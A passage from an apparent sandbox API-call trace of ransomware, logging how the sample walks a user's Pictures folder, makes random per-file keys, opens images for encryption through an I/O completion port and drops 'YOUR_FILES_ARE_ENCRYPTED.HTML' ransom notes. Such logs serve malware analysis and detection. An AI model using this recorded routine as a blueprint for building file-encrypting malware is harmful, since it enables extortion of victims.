param_1=0x4ebd77e, param_2="%02X" | out: param_1="AF") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8D") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CC") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="CA") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E6") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AB") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AE") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A7") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="68") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="1D") returned 2 [0168.703] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0F") returned 2 [0168.704] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\P1x_px8M5Vpn6c.jpg" [0168.704] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.704] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.724] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd90590, ftCreationTime.dwHighDateTime=0x1d7dd69, ftLastAccessTime.dwLowDateTime=0x5a99f3a0, ftLastAccessTime.dwHighDateTime=0x1d7e3ba, ftLastWriteTime.dwLowDateTime=0x5a99f3a0, ftLastWriteTime.dwHighDateTime=0x1d7e3ba, nFileSizeHigh=0x0, nFileSizeLow=0x11b9a, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="u OMCWlP.gif", cAlternateFileName="UOMCWL~1.GIF")) returned 1 [0168.727] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif") returned 70 [0168.727] lstrcmpW (lpString1="u OMCWlP.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.727] PathFindExtensionW (pszPath="u OMCWlP.gif") returned=".gif" [0168.727] lstrlenW (lpString=".gif") returned 4 [0168.727] PathFindExtensionW (pszPath="u OMCWlP.gif") returned=".gif" [0168.727] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\u omcwlp.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.728] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=72602) returned 1 [0168.728] GetProcessHeap () returned 0x270000 [0168.728] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.729] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="73") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="6A") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BE") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="20") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="81") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F2") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7C") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="8D") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="DC") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="25") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0D") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="27") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="02") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D9") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="40") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="25") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="26") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B9") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="EA") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="CB") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="61") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="ED") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="04") returned 2 [0168.729] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="2E") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="DE") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="07") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="6D") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="17") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="76") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="EA") returned 2 [0168.730] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="11") returned 2 [0168.730] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif" [0168.730] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.730] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd90590, ftCreationTime.dwHighDateTime=0x1d7dd69, ftLastAccessTime.dwLowDateTime=0x5a99f3a0, ftLastAccessTime.dwHighDateTime=0x1d7e3ba, ftLastWriteTime.dwLowDateTime=0x5a99f3a0, ftLastWriteTime.dwHighDateTime=0x1d7e3ba, nFileSizeHigh=0x0, nFileSizeLow=0x11b9a, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="u OMCWlP.gif", cAlternateFileName="UOMCWL~1.GIF")) returned 0 [0168.739] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0168.740] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0168.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0168.741] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0168.743] CloseHandle (hObject=0x598) returned 1 [0168.743] GetProcessHeap () returned 0x270000 [0168.744] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0168.750] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4e41a60, ftCreationTime.dwHighDateTime=0x1d7e1e8, ftLastAccessTime.dwLowDateTime=0x308c7650, ftLastAccessTime.dwHighDateTime=0x1d7e513, ftLastWriteTime.dwLowDateTime=0x308c7650, ftLastWriteTime.dwHighDateTime=0x1d7e513, nFileSizeHigh=0x0, nFileSizeLow=0xf824, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="oeut8R74cBHG7k.png", cAlternateFileName="OEUT8R~1.PNG")) returned 1 [0168.750] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png") returned 59 [0168.750] lstrcmpW (lpString1="oeut8R74cBHG7k.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.750] PathFindExtensionW (pszPath="oeut8R74cBHG7k.png") returned=".png" [0168.750] lstrlenW (lpString=".png") returned 4 [0168.750] PathFindExtensionW (pszPath="oeut8R74cBHG7k.png") returned=".png" [0168.750] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\oeut8r74cbhg7k.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0168.750] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63524) returned 1 [0168.750] GetProcessHeap () returned 0x270000 [0168.751] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.751] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0F") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="CE") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="61") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="42") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="93") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="BD") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="42") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CF") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="04") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AC") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="59") returned 2 [0168.751] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CF") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="80") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="50") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="59") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="57") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="0E") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E9") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C4") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="7A") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="22") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="65") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="33") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2E") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="92") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="0D") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="97") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B7") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="5C") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="65") returned 2 [0168.752] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4D") returned 2 [0168.753] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png" [0168.753] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.753] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7715b7a0, ftCreationTime.dwHighDateTime=0x1d7e444, ftLastAccessTime.dwLowDateTime=0xf34615a0, ftLastAccessTime.dwHighDateTime=0x1d7e506, ftLastWriteTime.dwLowDateTime=0xf34615a0, ftLastWriteTime.dwHighDateTime=0x1d7e506, nFileSizeHigh=0x0, nFileSizeLow=0x1196f, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="WuC6lhh5.bmp", cAlternateFileName="")) returned 1 [0168.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\WuC6lhh5.bmp") returned 53 [0168.753] lstrcmpW (lpString1="WuC6lhh5.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.753] PathFindExtensionW (pszPath="WuC6lhh5.bmp") returned=".bmp" [0168.753] lstrlenW (lpString=".bmp") returned 4 [0168.753] PathFindExtensionW (pszPath="WuC6lhh5.bmp") returned=".bmp" [0168.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7715b7a0, ftCreationTime.dwHighDateTime=0x1d7e444, ftLastAccessTime.dwLowDateTime=0xf34615a0, ftLastAccessTime.dwHighDateTime=0x1d7e506, ftLastWriteTime.dwLowDateTime=0xf34615a0, ftLastWriteTime.dwHighDateTime=0x1d7e506, nFileSizeHigh=0x0, nFileSizeLow=0x1196f, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="WuC6lhh5.bmp", cAlternateFileName="")) returned 0 [0168.753] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0168.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0168.754] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.755] CloseHandle (hObject=0x590) returned 1 [0168.756] GetProcessHeap () returned 0x270000 [0168.756] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.758] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.758] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\desktop.ini") returned 44 [0168.758] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.758] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.758] lstrlenW (lpString=".ini") returned 4 [0168.758] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.758] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1757e2f0, ftCreationTime.dwHighDateTime=0x1d7dcc6, ftLastAccessTime.dwLowDateTime=0xb56d4b90, ftLastAccessTime.dwHighDateTime=0x1d7defd, ftLastWriteTime.dwLowDateTime=0xb56d4b90, ftLastWriteTime.dwHighDateTime=0x1d7defd, nFileSizeHigh=0x0, nFileSizeLow=0xc548, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="I6ptmqC.gif", cAlternateFileName="")) returned 1 [0168.758] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif") returned 44 [0168.758] lstrcmpW (lpString1="I6ptmqC.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.758] PathFindExtensionW (pszPath="I6ptmqC.gif") returned=".gif" [0168.758] lstrlenW (lpString=".gif") returned 4 [0168.758] PathFindExtensionW (pszPath="I6ptmqC.gif") returned=".gif" [0168.758] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\i6ptmqc.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0168.759] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=50504) returned 1 [0168.759] GetProcessHeap () returned 0x270000 [0168.759] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.762] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="3C") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="74") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="4E") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="04") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="E9") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AD") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="41") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2A") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C5") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F1") returned 2 [0168.762] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="7C") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C2") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="9B") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="C1") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="4F") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="4F") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2D") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="02") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="09") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="2B") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="C9") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="1C") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="14") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C7") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="CF") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="22") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="3A") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4A") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="17") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="0E") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="D5") returned 2 [0168.763] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6F") returned 2 [0168.764] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif" [0168.764] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.764] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.764] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d07050, ftCreationTime.dwHighDateTime=0x1d7e31b, ftLastAccessTime.dwLowDateTime=0x61109380, ftLastAccessTime.dwHighDateTime=0x1d7e511, ftLastWriteTime.dwLowDateTime=0x61109380, ftLastWriteTime.dwHighDateTime=0x1d7e511, nFileSizeHigh=0x0, nFileSizeLow=0x7ef0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="o Q0Lm6h x34YXy.bmp", cAlternateFileName="OQ0LM6~1.BMP")) returned 1 [0168.764] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\o Q0Lm6h x34YXy.bmp") returned 52 [0168.764] lstrcmpW (lpString1="o Q0Lm6h x34YXy.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.764] PathFindExtensionW (pszPath="o Q0Lm6h x34YXy.bmp") returned=".bmp" [0168.764] lstrlenW (lpString=".bmp") returned 4 [0168.764] PathFindExtensionW (pszPath="o Q0Lm6h x34YXy.bmp") returned=".bmp" [0168.764] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="YS-I5C~1.PNG")) returned 1 [0168.764] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png") returned 52 [0168.764] lstrcmpW (lpString1="Ys-I5cZz8VrpRcO.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.764] PathFindExtensionW (pszPath="Ys-I5cZz8VrpRcO.png") returned=".png" [0168.764] lstrlenW (lpString=".png") returned 4 [0168.764] PathFindExtensionW (pszPath="Ys-I5cZz8VrpRcO.png") returned=".png" [0168.764] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\ys-i5czz8vrprco.png"), dwDesiredAccess=0xc0010000, 